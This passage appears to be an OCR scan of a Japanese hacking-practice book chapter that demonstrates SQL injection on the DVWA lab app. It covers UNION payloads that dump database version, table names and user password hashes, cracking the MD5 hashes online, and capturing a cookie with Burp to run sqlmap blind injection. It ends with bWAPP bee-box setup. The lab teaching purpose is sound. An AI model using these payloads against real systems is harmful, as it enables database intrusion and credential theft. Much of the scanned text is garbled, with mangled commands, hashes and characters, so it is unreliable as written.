ます Celite' 一 "eleet 一 "31337)。 
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記紀 | 昌 login ::Dpamnvulneeeb X| 十 yy 


の ⑫ localhost31337/DVWA-master/login.php 





図 7-7 Edge で アク セス で きた 


潤 SQL イ ンジ ェクション 

SQL イ ンジ ェクション と は 、Web ア プリ が 想定 し な い SQL を 実行 きせ て 、DB 
を 不正 に 操作 する 攻撃 で す 。 本 書 で は 実際 に 手 を 動か し て 、 攻 撃 を 体験 し て み ま 
に 下 :⑳a 


@ DVWA で SQL イン ジェ クシ ョ ン を 体験 する 

DVWA に は 4 段階 (Low / Medium / High / Impossible) の セキ ュ リ ティ レベ 
ル が 用 意 さ れ て いま す 。 本 書 で は ハッ キン グ 初 心 者 を 対象 に し て いる の で 、 セ 
キュ リティ レベ ル を Low に し ます 。 メ ニュ ー の 「DVWA Security」 を 押し て 、 
[Script Security」 を "Low" に し て Submit ボタ ン を 押し ます 。 
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1User ID を 入力 し て 挙動 を 確認 する 
メニ ュー か ら 1|SQL Injection」 を 選び ます 。 | Vulnerability: SQL Injection」 画 
面 が 表示 され ます 。|User ID」 の 入力 欄 が 1 つ だ け あ り ま す ( 図 78)。 


Vulnerability: SOL Injection 


Submit | 





More Information 








図 7.8 [Vulnerability: SQL Injection] 画面 


と りあ え ず 、 次 の よう な 値 を 入力 欄 に 人 人 れ て 共 動 を 確認 し ます 。 


ID: 1 

FirSt name: admIn 
Surname: dmin 
ID: 2 

FirSt name: Gordon 
Surname: Brown 


ID: 3 
FirSt name: Hack 
Surname: Me 
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表示 結果 か ら 、[select ??.?? from ?? where id =< 入 力 値 >]」 と いう SQL 文 が 実 
行 さ れ て いる と 推測 で きま す 。 該当 レコ ー ド が あれ ば 、ID に は 入力 文字 列 、First 
name に は 1 番目 の ?? の 値 、Surname に は 2 番目 の ?? の 値 が セッ ト さ れ て いる と 思 
われ ます 。 


②)SQL イン ジェ クシ ョ ン で すべ て の フィ ー ル ド を 表示 させ る 

SQL イ ンジ ェクション の 典型 的 な コー ド 「1 OR a=a」 を 入力 し ます 。 す る と 、 
次 の よう な 結果 が 得 ら れ 、 単 純 な SQOL イ ンジ ェクション に 対す る 脆弱 性 が ある こ 
と が わか り ま す 。 条件 名 が TRUE に な り 、 す べ て の フィ ー ル ド が 表示 され た わけ 
で す ( 図 7.9)。 


Useripl| | sem 


ID: 1'′ OR ' ぉ "=' ョ 
First name: admin 
SUFHaHIG: amAm 

ITD: 1' OR "8a* こ =" ョ 
F1fSt ae: GOFOOI 
SMUTTNB 上 で: HTOmTh 


ID: 1" OK "8a"="a 


F1fSst Wa: Hack 
5MTTa 骨 人 * 痢 E 


ID: 1'′ OR '』*"=*' ョ 
Ftrst name: Pabhto 
SUIFINaHHGz PC て gs50 


TD: 1' 0R "8"=' 
F ユ rst nsme: Bob 
SUTTNBMME: Si1th 





図 7.9 「1' OR 'a='a」 を 指定 し た 結果 


3⑬③DB シ ステ ム の バー ジョ ン を 取得 する 

傘 は 、DB シ ステ ム の バー ジョ ン を 取得 し て み ま す 。 UNION を 使う と SELECT 
文 を 統合 で きま す 。 ま た だ た 、SQL で DB の バー ジョ ン を 取得 する に は 、"'@@version 
ある い は "version()′ を 使用 し ます 。 

そこ で | ' union select version() #| を 入力 する と 、The used SELECT statements 
have a different number of columns"” と いう エラ ー が 返っ て きま す 。UNION を 利 
用 し て いて 、 一 部 の カラ ム が な い 場 合 に 出力 され る エラ ー で す 。 SELECT 文 に null 
を 追加 し た 形 で 入力 する と 、DB シ ステ ム の バー ジョ ン が 10.1.29 と 判明 し まし た 
( 図 7-10)。 
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ID: ' union select version(),null # 
"uniOn Select versiOn(),null # First name: 10.1.29-MariaDB-6+Db1 
SUITaITIG: 


TD: * uminmn seLect version(],nuLl まき 
First mame: 18.1.29-MariaDB-6+b1 
SUTfBTIG : 





図 /.10 DB シス テム の バー ジョ ン が 表示 され た 


な お 、| union select version(). null - 」 (最後 に 空白 が 1 文字 入る こと に 注意 ) と 
まま EN の し う 。 


(④) ホ スト 名 、 DB 名 、 ユー ザー 名 を 調べ る 
続け て 、 ホ スト 名 、 DB 名 、 ユー ザー 名 を 調べ ます 。 ホ スト 名 は "@@hostname 、 
デー タベース 名 は "database() 、 ユ ー ザ ー 名 は "user() で 取得 で きま す 。 


ID: union select @@hostname.database() ミ 
' union select @@hostname.database() # | First name: kali 
Surname: dVWa 


ID: ' union select user(),A 
' union select user().A'# First name: IDuSiron@localhost 
SUrname: A 





この シス テム で は "dvwa と いう デー タベース を 使用 し て いる こと が わか り ま 
。 


⑤ テ ー ブ ル 名 の 一 覧 を 取得 する 
information_schema デー タベース は 、DB に 関す る 情報 が 保存 され て いる デー 
タベース で す ("5) 。 ユー ザー は 直接 更新 し た り 削 除 し た り は し ませ ん が 、 参 照 で 


*5 : https//dey.mysaqlcom/doc/retman/5.6/ja/information-schema.html 
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きま す 。 主 な テー ブル と し て 、 表 7-1 の よう な も の が あり ます 。 


表 7-1 jnformation_schema デー タベース の 主 な テー ブル 


| 机 
DB 自体 の メタ 情報 を 格納 する 。 
テー ブル 名 や 文字 コー ド を 確認 で きる 。 


テー ブル の メタ 情報 を 格納 する 。 
table_schema に DB 名 、table_name に テー ブル 名 が 格納 され て いる 。 


カラ ム の メタ 情報 を 格納 する 。 
tables と 同様 に 、DB 名 や テー ブル 名 も 格納 され て いる 。 





ここ で は 、 次 の よう に 入力 し て テー ブル 名 の 一 覧 を 取得 し ます ( 図 7-11)。 


入力 


*′ union select table_name,nu1] from infonrmation_schema.tables 


ws | に mmm 


1D: ' Munhion seLEct tablte na 生 G.nULL from information Schema_.tables ま 
First mamgi: L7GX4S02ZL 
5uFna 力 * 


ID: ' uiOT SSLect tabLe_nale。hULL from 1mformation schewa.tables ぎ ば 
First name: questbook 
SU「 Na 旭 : 


ID: '′ union sgLect tablLg naWG,fuLL from 1mformation schewa.tablqs # 
FrSt ma 衝 G: USGTS 
Sur ia : 


1JD: ' union seLect table namme.nuLl frnm imformation schewWa_.tables まほ 
F ュ Fst JaGi ALL PLUGINS 
SuFn コ MEG : 


ID: ' union SeLect tabLe_ namae.nutl from information schewa.tables \ 
F1FSt IM8 導 CGC: APPLTCABLE ROLES 
SurnaMtG : 





図 7-.11 テー ブル 名 が 表示 され た 


⑥DVWA が 用 いて いる テー ブル を 特定 する 

大 量 の テー ブル が ある こと が わか り ま し た が 、 この 中 か ら DVWA が 用 いて いる 
テー ブル を 特定 し ます 。 次 を 入力 する と 、"dvwa と いう DB が 保持 する テー ブル 
の 名 前 を 抽出 で きま す 。 
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結果 と 4 2 つの テー ブル を 特定 で き ま し だ ぁ 怪し い の は users テ ー ブ ル で す 。 
ここ に ユー ザー 情報 が 格納 され て いる と 期待 で きま す 。 し か し 、 こ れ は 推測 に , 過 
きま せん 。 次 の よう に 入力 し て 、 カ ラム 名 も 参照 し て み ま す 。 
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これ で users テ ー ブ ル の カラ ム 名 が すべ て 判明 し まし た 。 


⑦ パ スワ ー ド を 出力 する 

dvwa デ ー タ ベー ス の users テー ブル に 、 password と いう カラ ム が あり ます 。 こ 
こ に パス ワー ド (ある い パ スワ ー ド ハッ シュ ) が 格納 され て いる と 推測 で きま す 。 
そこ で 、 次 の よう に 入力 し ます 。 カ ラム に は user と password を 指定 し まし た 。 
user_ id で は 、 ど れ が 最も 重要 な レコ ー ド か わか ら な いた めで す 。 user を 指定 し 
て 、"admn'′ や root と 出 て いれ ば 、 そ の レコ ー ド が 最も 重要 と わか り ま す 。 ま 
た 、 パ スワ ー ド 解析 に 用 いる パス ワー ド フ ァイル は 一 般 に [ユー ザー 名: パス ワー 
ド ハ ッ シュ 」 と いう 書式 で あり 、 こ れ を 作成 で きま す ( 図 7-12) 。 
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TID: ' union seLect user,password frow dvwa.usGrs ぜ 
FiFrst name: ai 
Surname: 5f4dcc3b5aa765d61d8327deb882cf99 


ID: *′ uin1aon setect user.DaSSword イ from dvwa.lSerS ま 
F ュ rst name: Ordonb 
SFOa コ SC: G99a1HC428Cb3Hd5f258853678922e93 


ID: ' un1Oh SeLect user.DasSwOFd fFOdW dVwa.USGFS が 
First name: 1337 了 
Surnamie: 8d3533d75ae2c3966d7eB6d4fcc69216b 


TID: ' un1On SeLeCt uSer,DaSSwOFd frOmW dvVwa.USefS ま 
Farst name: PabLo 

SurnaWe: 6d167099f5bbe46Cade3de5c71e9e9b7 

ID: *: unlon Setect user,DasSword イ from dvwa.USers # 


First ma@: St 
SUFnaaG: 5f4dcc3b5aa765d61d8327debB882cf99 





図 7-12 暗号 化 さ れ た パス ワー ド が 出力 され た 


出力 結果 より 、password に 格納 され た デー タ は 「 パ スワ ー ド の MD5 ハ ッシュ 
値 」 と 推測 で きま す 。 


⑧ MD5 Online で バス ワー ド を 解析 する 

後 は パス ワー ド 解 析 と いう フェ ー ズ に 移り ます 。 パ スワ ー ド クラ ッ カ ー で 解析 
し て も よい の で す が 、DVWA は 世界 で 広く 使わ れ て いる の で 、 こ の ハッ シュ 値 は 
すでに 解析 済み の 可能 性 が 高い と いえ ます 。 

ハッ シュ 値 か ら 元 の 入力 値 を 調べ て くれ る Web サー ビス が あり ます 。 こ れ は 逆 
計算 し て いる わけ で は な く 、 入 力 値 と ハッ シュ 値 の ペア を DB で 管理 し て お き 、 
ハッ シュ 値 で 検索 を か け て 該当 する 元 の 入力 値 を 返す と いう 仕組 み で す 。 
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* CrackStation (https://crackstation.net// 


s MD5 Online (https://www.mdSonline.org/) 


ここ で は 、MD5 の ハッ シュ 値 を 解析 し た い の で 、MD5 Online を 用 い 


La 


す 
admin の ハッ シュ 値 5f4dcc3b5aa765d61d8327deb882cf99 を 入力 し て 、LDecrypt」 


| 


ボタ ン を 押し ます 。 そ の 果 、 元 の 文字 列 は password と 判明 し まし た ( 図 


Willli: 


MDU5 Uecrypt MIU5 Encrpt MD5List Premium Feedback 


MUS UeCrypter 





図 /-13 MD5 Online に よる 調査 結果 


これ は DVWA の 認証 画面 で 入力 し た 結果 (ユー ザー 名 が admin 、 パ スワ リード 


が password ) と 一 致し て いま す 。 他 の パス ワー ド も 解析 する と 表 7-2 の よう な 灯 


MD5 の ハッ シュ 値 パス ワー ド (解析 結果 ) 


5f4dcc3b5aa765d61d8327deb882cf99 
e99a18c428cb38d5f260853678922e03 |abc123 
8d3533d75ae2c3966d7e0d4fcc69216b 
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0d107d09f5bbe40cade3de5c71e9e9b7 


smithy 。 | 5f4dcc3b5aa765d61d8327deb882cf99 


いっ た ん ログ アウ ト し て 、 再 度 http://localhost/DVWA-master/ に アク セス し 
ます 。DVWA の 認証 画面 が 表示 され る の で 、 解 析 結 果 で ログ イン で きる こと を 確 
認 し ます 。 ロ グイ ン す る と 、 左下 に その ユー ザー 名 が 表示 され る こと を 確認 し ま 
す 。 





⑨ findmyhash で パス ワー ド を 解析 する 

ステ ッ プ ③⑧ の 方 法 で 検索 され な か っ た 場合 は 、findmyhash を 用 いま す 。 
findmyhash は 、 た くさ ん の Web サ ービス (ステ ッ プ ⑧ で 紹介 し た よう な 解析 サイ 
ト ) を 自動 的 に 巡回 し て 、 元 の パス ワー ド を 調査 する ツー ル で す 。 

例え ば 、 MD5 の ハッ シュ 値 の 場合 は 、 次 の よう に 入力 し ます 。 オプ ショ ン で 、 
1 つの ハッ シュ 値 を 指定 し まし た 。 
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一 部 応答 が 遅い Web サ ービス が あり ます が 、 最 終 的 に 元 の パス ワー ド を 解析 で 
きま し た 。 な お 、 フ ァイル を 指定 し た い 場 合 に は 、f オ プシ ョ ン を 用 いま す 。 


消 ブラ イン ド SQL イ ンジ ェ フ ショ ン 

プラ イン ド SQL イ ンジ ェクション と は 、 応 答 ペ ー ジ か ら 情 報 を 直接 奪う の で は 
な く 、SQL に 対し て の 応答 ペー ジ の 違い か ら 情 報 を 奪う 攻撃 で す 。 例 えば 、 応 答 
ペー ジ の 表示 の 時 間 差 、 デ ー タ の 違い な ど と いっ た 情報 を 活用 し ます 。 
僅 DVVVA で フラ イン ド SQL イン ジェ クシ ョ ン を 体験 する 

ここ で は Burp Suite (Burp と 略す ) と Sqlmap を 活用 し て 、 プ ライ ンド SQL イ 
ンジ ェクション を 実行 し ます 。 


①User ID を 入力 し て 挙動 を 確認 する 
メニ ュー か ら |SQL Injection (Bind)」 を 選 未 と 、| Vulnerability: SQL Injection 
(Blind)」 画面 が 表示 され ます ( 図 7-14)。 


Vulnerability: SOL Injection (Blind) 


PE 


More Information 





殖 httD : リ MuwyW- SeCUFIIEAIT_COITYU SE て UHFILVTeVievrsl ち ロロ 0N1P76E hfrml 
e htns リ en。vrtkinedli リ 四 Qi1 


。『 ド も っ 4 | 
キ htiD' リ 7ferruh_-rmavItuma.Corm'sn HmnleC41On-Cheatsheet-OKUU 
e htD pwrnitestumonksyineVchssLshewbsqliniecllonmmysdlsdLinlecuoh て heatLshwwl 
e htiDS り huww_owagp_ordfindex_phn'ElInd SOL injection 
e htUp bobby tablgs。cofm」 


に 電 RTUUW に ロリ 





図 7-14 「VulInerability: SQL Injection (Blind)」 画面 


色々 数 値 を 人 れ て 動作 を 確認 し て み ま す 。 
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和 スカ (UseriD) | 





性 I User ID exiSts in the dataDase. 
3333 。 |UserIDisMISSING from the database. 


②)Firefox の 設定 を 変更 する 

手動 で プラ イン ド SQL イ ンジ ェクション を 実行 し て 、 目 的 の 情報 を 奪う の は 手 
間 が か か り ま す 。 そ こ で 、Sqlmap と いう SQL イ ンジ ェクション に 特 化 し た ツー ル 
を 用 いま す 。 こ れ を 利用 する た め に 、 Burp で HTTP 要求 に 含ま れる Cookie を 事前 
に 入手 し て お きま す 。 

Burp は 、 一 言 で いう と ロー カル で 動作 する Proxy サ ー バ ー で す 。 プ ブラ ウザ の 
Proxy の 設定 で Burp を 指定 する こと で 、HTTP 通信 に 介入 し て 、 通信 を 止め た り 、 
変更 し た り で きま す ("6)。 

具体 的 に は 次 の よう に 設定 し ます 。 ま ず 、Firefox を 起動 し ます 。 右 上 に ある 
「Open menul アイ コン を 埋 し て 、 | Preferences」 アイ コン を 押し ます 。Preferences 
ペー ジ が 表示 され る の で 、 左側 か ら Advanced を 選び ます 。 |Network」 タブ を 選択 
し 、Connection の 【[Settings] ボタ ン を 押す と 、| Connection Settings」 画面 が 表示 
され ます 。 ここ で 、| Use system proxy settings」 か ら 「Manual proxy configuration」 
に チェ ッ ク を 切り 替え ます 。 

|HTTP Proxy」 に |127.00.1」、Port に |9500]」 を 指定 し ます 。Burp の デフ ォ ル 
ト の ボート 番 号 は 8080 で す が 、 こ の 値 は 様々 な アプ リ で 採用 され て いる の で わざ 
と ずら し まし た 。 

「Use this proxy server for all protocols] に チェ ッ ク を 入れ て 、[「SSL Proxy」 
IFTP Proxy」 |「SOCKS Host」 に も 反映 させ ます 。 

[No Proxy for」 に は 「localhost 127.00.1」 と 記述 され て いま す が 、 こ れ を 削除 
し ます (localhost の Proxy を 使う た め )。 こ れ で 設定 は 終わ りな の で 、[OK] ボタ 
ン で 反映 し ます ( 図 7-15)。 


*6 : Burp を 使用 し な い 場 合 に は 、 Burp を 終了 させ 、 プ ラウ ザ に て Proxy を 使用 し な いよ うに 設定 
を 戻す 必要 が あ り ます 。 
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Connection Settings 


Confiqure Proxies to Access the Internet 
No proxy 
、) Auto-detect proxy settinds for this network 
、) Use system proxy settinqs 
|) Manual proxy confiquratin: 
HTTP Proxy: 127.0.0.1 


SSL Proxy: 127/.0.0.1 
FTP Proxy: 127.0.0.1 
SOCKS Host 127.0.0.1 


SOCKSv4 穫 SOCKS v5 
No Proxy for 


Example: .mozilla.orq, .net.nz, 192.168.1.0724 


Help 





図 7-15 「Connection Settings」 画面 (設定 後 ) 


3 Burp の 設定 を する 

ラン チャ ー か ら Burp を 起動 し ます 。 初 回 起動 時 に は 様々 な 確認 (ライセンス の 
同意 、 和 警告 メッ セー ジ 、 ア ッ プ デー ト の 確認 な ど ) が 表示 され る か も し れ ま せん 
が 、 そ の まま 進み ます 。 

Welcome と いう メッ セー ジ 画 面 が 表示 さ た ら 、| Temporary project」 を 選択 し 
て 、[Next] ボタ ン を 押し ます ( 図 7-16)。 
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Burp Suite Community Edition v1.7.32 ら @ ら @ @ 


| Welcomc to Burp Suite Com munity EdWton Usc he options bclow to creote or pen 9 DrOK RURPSMIE 


Noe DJcK-bat0 ツ poirC ar で On か UPDPOrUeO o7 Bu7D Sie Pro 本 ssion』 {UMMUNITY EDITION 


⑳ Tempormwy projett 


NNew pfojert on disk 


目 Opcn cxismg projec も 





Se Snider and SC<annef 





7-16 Welcome 画 面 


設定 の 選択 画面 が 表示 され た ら 、[Use Burp defaults」 を 選択 し て 、[Start 
Burp] ボタ ン を 押し ます ( 図 7-17) 。 


Burp Suite Community Edition v1.7.32 る @@ の 


?) Select he configurebon Fiat yeu woukd like to lead Gr h ほ proje く も RURPSMUIIF 


(COMMUNITY EDITION 


Usc HBurp defautts 
N 


WW Use copitions saved wilh project 





し) Load fromm confhguralion file 


し Default te [he above in future 
ロ Dcable extensiont 





図 7-17 設定 の 選択 画面 
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する と Burp の メイ ン 画 面 が 表示 され ます ( 図 7-18)。 こ の 画面 が 基本 と な り ま 
す 。 








天 加 回 回 っ で em 


図 /-18 Burp の メイ ン 画 面 


上 の 「Proxy」 タブ を 選択 し 、 そ の 下 の 「Options] タブ を 選択 し ます 。 上 部 に 
|Proxy Listeners」 と いう 項目 が あり ます 。 |127.0.0.1:8080」 を 選択 し て 、[Edit」 
ボタ ン を 押し ます 。「Bind to port] に 「9500]」 を 指定 し て 、[OK] ボタ ン を 押し 
て 反映 させ ます ( 図 7-19) ( 図 7.20) ( ツ 7)。 


7 : Burp な どの ロー カル Proxy を 介し て 、 イ ンタ ーネット の Web サ イト (HTTPS) に アク セス 
する と 、"Your connection is not secure' と いう ペー ジ が 表示 され て アク セス で き な い こと が あ 
り ま す 。 そ の と き は 、Firefox の 「Connections Setting|」 に て 、「Manual Proxy configuration | か 
ら |Use system proxy settings」 (ある い は [No proxy」) に 戻し ます 。 
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の TIwese setbngs control how Burp bnds he proxy liskmmer 


wao 


Bing bo aodress: 個 Loopbsck only 
旨 All interfaces 


⑨ Specllc address. | 30.0.2.35 | 





図 7.19 「Edit proxy listener」 画面 (設定 後 ) 


Burp Suite Community Edition v1.7.32 - Temporary Project る @ @ 人 


Burp lntruger Repeater Window Hela 
| rect el eeer | soonmer memeecr | ncpeewer | sequcnccr | pccedcr | cempsrer | wwwnder | Paoptens | usercpeons [Aces| 
wsbscckcs hstory opemza 

2 Proxy Listeners 


KJ Burp Proxry ScS stcncrs 1 rcccivc Incoming HTTP rcqucstS from your brows で r Yo wll nccd to configewrc your browscr to uSc onc of thc listcncrs as Its 





Each installeson of Burp gcncrgtes (ts own CA certUficate net Proxy lsteners can use when neqouebng SSL connecborz. You て gn impOrt or で xDOdt this て で 
oo ls or anotmer inskallation qf Burp. 


| Impot / export CA certficate | | Reoenerate CA certificale | 


| InterceDt Client Recluests 


【:】 し sc hesc scings ko conlrol which requests are stalled for wiewing and edibng in the Inte rcept tab- 


回 Intercept requess based on ne followino rules 用 aka Nercepbon gs uned 
| Add | Enasied | Qperater | natch cype Relatiosship 」 Condaon 
ーー ュー Fle extension Does net malch I^gfs| jp93^png3| csS3| ^j5*$| iCo$ 
| gd を 。 | こ ReGuest Conlains Perameters 
HTTP method Daes not malch Igetlpcsll 


URL lt In tmrget scoDpe 





図 7.20 「Proxy」 の 「Options」 画面 (設定 後 ) 
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これ で Burp を 利用 する 準備 が で きま し た 。 


④HTTP 要 求 を 捕捉 する 

Burp に て 、「Proxy」 > 「Interceptl タブ を 選択 し ます 。 こ こ で は 、 HTTP 通信 
を 一 時 停止 させ 、 そ の 内 容 を 確認 ・ 編 集 さ せ た り 、 通 信 を 遮断 させ た り で きま す 。 
ボタ ン に 「Intercept is off] と 表示 され て いれ ば 、HTTP 通 信 は 一 時 停止 せ ず に 、 
その まま プラ ウザ か ら Web サ ー バ ー へ 送ら れ ま す (Burp を 通過 する が 、 単 に リ 
レー する だ け )。 こ の ボタ ン を 押し て |Intercept is on」 と 表示 され て いる と 、 
HTTP 通 信 は 一 時 停止 し 、 捕 提 し た HTTP 人 通信 が 「Raw」 タブ に 表示 きれ ます 。 

ここ で は 、|Intercept is on」 に し て お き 、Firefox で |http://localhost/DVWA- 
master/vulnerabilities/sqh_blind/?id=1&Submit=Submit#]」 に アク セス し ます 。 
HTTP 要 求 を 捕捉 し た ら 、[Action] ボタ ン > [Copy to fie」 を 選び 、 "dvwa_sql_ 
header.txt ファ イル に 保存 し ます ( 図 7.21)。 その後 、「Intercept is off] に し て 、 
通信 が 流れ る よう に 戻し ます 。 


Burp Suite Commumty Editian v1.7-35 - Temporary Projet 
_Burp inruder RePester Window He [ 
Tee 請 当 し per | *cermer | nrudcr | Rpcwer [cwencer [peceder | compwrer [evsrecr [pectepsem | ue emem Ace | 


生 ド | 中 P mor | ebsockets history | Options_ 


ーーー 


| | Request te htpzjlocalhost:80 127.0.0.11 


EET /DVWA-mast で Fulmerab1ts そ 3 で </sGL1 bsnd/ リ 『 ュ d=1 
Host: localhost 

User-AOCnt: 用 Ocntla/5.0 (X11: Lnnux xB6 64: ryvi52 
cc で pt: text/htmt.opptkcqataom/xhtml<xmt。anplscnt1 


1 で : Se で Ur3 そ yelou: PHP5ESS10=7d:<ikpm)oa4kr3e 
Connect】on: Lo*e 
目 Pd rade- Ts で CUP で - ミ : | Engegcment toos [Pre Y で rion only 
Chanoe 『eque4F mnethod 
Chanoe bo cnceding 
Copy URL 
Copy 8s Carl Command 


yy to 1 衣 
Paste frem fle 

Save Item 

DOn1 InUET て で Dt reQuesks 
Do IntercePt 


Comuerft selection 
URL で COGe a5 you IyPe 
Cu 
に OPy 
PasSe 

tessage editor help 
Proxy Inkercwption help 





図 7-21 Burp で 捕捉 し た HTTP 要 求 
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"dvwa_sql_header.txt ファ イル の 内 容 は 、 次 の 通り で す 。 こ こ に Cookie の 情報 
が 載っ て いま す 。 





5)Sqlmap を 実行 する 
Sqlmap を 実行 する 情報 が 揃い まし た 。-u オ プシ ョ ン に URL、-cookie オプ ショ 
ン に Cookie の 値 を セッ ト し て 、Sqlmap を 実行 し ます 。 
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[ ! ] 1ega1 disc1aimer: Usage of sq1map for attacking targets .! 
without prior mutua] consent is i11ega1 . It is the end user's .」 
responsibi1ity to obey a11 app1icable 1oca1, state and federa1 .」 
1aws . Developers assume no 1iabi1ity and are not responsible for .」 
any mm1SuSse Or damage Caused by this program 


[*] starting at 17:39:31 


[17:39:32] [INFO] resuming back-end DBMS "mysq1' 
[17:39:32] [TINFO] testing connection to the target URL 
sq1lmaD resumed the fol1lowing in]ection point(s) from stored sess1on: 
Parameter: 1d (GET ) 
Type: boolean-based bl1ind ブラ イン ド S0L イ ンジ ェクション の 勝 級 性 あり 。 
Title: AND boolean-based b1ind - MHERE or HAVING clause 


Payload: 1d=1' AND 2228=2228- - hkbT&Submit=Submit 


Type: AND/OR time-based bl1ind 2 りり に アン キア ルー ピ スグ の ) に 7 戸 
Title: MySOL >= 5.9.12 AND time-based blind 


Payload: 1d=1' AND SLEEP( 5 ) - - mCKA&Subm1t=Submit 


[17:39:32 ] [INFO] the back-end DBMS is MySOL 

web Sserver Operating system: Linux Debian 

web application technology: Apache 2.4.34 

back-end DBMS: MySOL >= 5.9.12 

[17:39:32] [INFO] fetched data 1ogged to text files under '/root/ .」 
sq1map/Ooutput/1oca1hos† 








[*] shutting down at 17:39:32 


出力 結果 か ら プ ライ ンド SQL イ ンジ ェクション の 脆弱 性 を 持つ こと が わか り ま 
し た 。Sqlmap を 使え ば 、 効 率 的 に DB 内 の 情報 を 得 ら れ ま す 。 こ こ で は 、--dbs オ 
プシ ョ ン を 指定 し て 、DB 名 を 表示 し ます 。 
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6 つの DB が 判明 し まし た 。 DB 名 か ら dvwa が 最も 怪し いと いえ ます 。-D オ プ 
ショ ン に DB 名 を 指定 し た うえ で -tables オ プシ ョ ン を 用 いる と 、 そ の DB 内 の 
テー ブル が 列挙 され ます 。 





dvwa テ ー ブ ル に は 、gnuestbook と users と いう テー ブル が ある こと が わか り ま 
し た 。 次 の よう に 入力 し て 、users テー ブル の カラ ム を 調べ ます 。 
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user と password と いう カラ ム が あり 、 こ こ に パス ワー ド が ある と 推測 で きま 
す 。 
次 の よう に 入力 する こと で 、 パ スワ ー ド 解析 まで し て くれ まし た 。 
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「 DWAPP bee-box で Web アプ リ の 





2 | ハッ キン グ を 体験 する 


bWAPP (buggy web application) は 、 王 に Web ア プリ の セキ ュ リ ティ を 学習 
する た め の Web ア プリ で す 。100 を 超え る 脆弱 性 を 備え て お り 、 網 北 的 に Web ア 
プリ の ハッ キン グ を 学習 で きま す 。OWASP Top 10 プ ロジ ェクト (https://www. 


ーー 


owasp.org/index.php/]apan) の 脆 弱 性 に つい て も カバ ー さ れ て いま す 。 


光 bWAPP bee-box の セッ ト ア ッ プ 


bWAPP bee-box (bee-box と 略す ) は 、bWAPP が イン スト ー ル され て いる 
Ubuntu ベー ス の Linux で す 。bee-box を 使え ば 、bWAPP を 利用 で きま す 。 


1)bee-box を タウ ン ロ ー ド する 
次 に 示す サイ ト か ら bee-box_v1.6.7z ファ イル を ダウ ン ロ ー ド し ます 。 






「 
bWAPP - Browse /bee-box at SourceForge.net 


| https://sourceforge.net/projects/bwapp/files/bee-box/ 
\ 


2) フ ァイル を 展開 する 

ダウ ン ロ ー ド し た ファ イル を 展開 し ます 。 ここ で は C:\Users\ipusiron 
\Downloads\bee-box_v16' に 展開 され た も の と し ます (jpusiron' の 箇所 は 自身 
の ユー ザー 名 に 置き 換え て くだ さい )。 展開 され た ファ イル は 、 次 の 通り で す 。 


C:\Users\1pus1ron\Downloads\bee-box _v1.6>dir /b /s 
C:\Users\1pusiron\Downloads\bee-box _v1.6\bee-box 

( 略 ) 
C:\Users\1pus1ron\Downloads\bee-box v1.6\bee-box\bee-box . vmdk 
C:\Users\1pus1ron\Downloads\bee-box v1.6\bee-box\bee-box . vmsd 
C:\Users\1pus1Fon\Downloads\bee-box _v1.6\bee-box\bee-box . vmx 


C:\Users\1pus1ron\Downloads\bee-box_v1.6\bee-box\bee-box . vmx 生 
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③⑬③VMWare を イン スト ー ル する 

VMWare を イン スト ー ル する と (%)、"OVFTool' フォ ル ダ ー が で きま す 。 こ こ 
で は 'C:\Program Files (x86)\VMware\VMware Player\OVFTool' で ある も の 
し まま らら 


④)ovf フ ァイル を 生成 する 

"ovftoolexe'" で vmx フ ァイル か ら ovf フ ァイル ("9⑨) を 生成 し ます 。 そ の た め に 、 
コマ ンド プロ ンプ ト あ る い は PowerShell を 起動 し ます 。 "ovftoolexe"” ファ イル の 
ある フォ ル ダ ー に カレ ント ディ レク トリ を 移動 し て 、 第 1 引数 に 入力 で ある vmx 
ファ イル の パス 、 第 2 引数 に 出力 で ある ovf フ ァイル の パス を 指定 し ます 。 





生成 され た "bee-boxovP ファ イル は バッ クア ッ プ し て お きま す ("10)。 


8 : VMWare は 仮想 化 ソ フト の 一 種 で す 。 こ こ で は ファ イル の 変換 の た め だ け に 用 いて いま す 。 
https//www.vymware.com/jp.html 


9:OVEF (Open Virtnalization Format) は 、 規格 化 され た 仮想 マシ ン の ファ イル デー タ の 集まり 
で す 。ova 形 式 は 単 一 ファ イル で し た が 、ovf 形 式 は 複数 の ファ イル か ら 構 成 さ れ て いま す 。 


*10 : iso フ ァイル や ovf フ ァイル な ど は 、 た いて い 容 量 が 大 きい と いえ ます 。 再度 必要 に な っ た と 
き に 、 改め て ダウ ン ロ ー ド し た り 探 し た りす る と 手間 が か か る の で 、 バ パ バックアップ し て お く こ と 
を お すす めし ます 。 
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5)bee-box の 仮想 アプ ライ アン ス を イン ホー ト す る 


石 ク リッ ク し て 、| プ ログ ラム か ら 開 く 」 > | VirtualBox Manager」 を 選び ま 
す 。 す る と 、VirtualBox が 立ち 上 が り 、 | 仮想 アプ ライ アン ス の イン ポー ト 」 画面 


が 表示 され ます 。 名 前 が vm と な っ て いて わか り に くい の で 、 "bee-box 1.6" に 変更 
レ し て 、 イ ン ボ ポー ト し ます 


6 仮想 LAN アタ プター の 設定 を する 


bee-box の 仮想 マシ ン の 仮想 LAN ア ダ プ ター を 次 の よう に 設定 し ます 。 


割り 当て : ホス ト オ ン リー アダ プター 





名 前 : VirtualBox Host-Only Ethernet Adapter 


起動 し て 、 デ スク トッ プ 画 面 を 表示 し ます ( 図 7-22)。 


し ' 寺 
日 | SeCUrify. Salteelate【 NTilef IrQInITHd elileilli 
と 、 


SVAPP Intrr 


WWW 介 - ames.com - info@itsecgames.com 


| I ま 」 





同 較 | | 
回 記 の 雪 回 克 回 みゆ 回 ote | 


図 7.22 bee-box の デス クト ッ プ 画面 
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IP アド レス を 確認 する 
上 部 の Terminal ア イコ ン か ら Terminal を 起動 し ます ("11)。 ifconfig コマンド 


で IP アド レス を 確認 し ます 。 


bee 人 Dee- box : <$ ュ 1†con†1g 


8bWAPP の ペー ジ に アク セス する 
プラ ウザ で http://<bee-box の IP アド レス >/bWAPP に アク セス する と 、bWAPP 
の ペー ジ が 表示 され ます ( 図 7-23)。Kalhi から で も Windows か ら で も アク セス で き 


ww 


の n exTrernely u44y w6 ら レレ の PP 


Navwy Uee ビ In よこ ralze ん Tranna Poa 


/ Lo2I1 / 


EEF VOMI C「GCOGPT35 De の DO 


LDREM 
OQW 
S ら Ca yOU『 
に TI (当り 
し に に きい 
SOL In]ection 


Security Audsts & Yainim VulInerab 帆 les 





図 /-23 bWAPP の ペー ジ 
PHP Code Injection 攻撃 
ここ で 、bee-box の IP アド レス は 1000.103 と し ます 。 


11 :SSH で ログ イン する 場合 に は 、ID に bee 、 パ スワ ー ド に "bug を 指定 し て くだ さい 。 sudo 
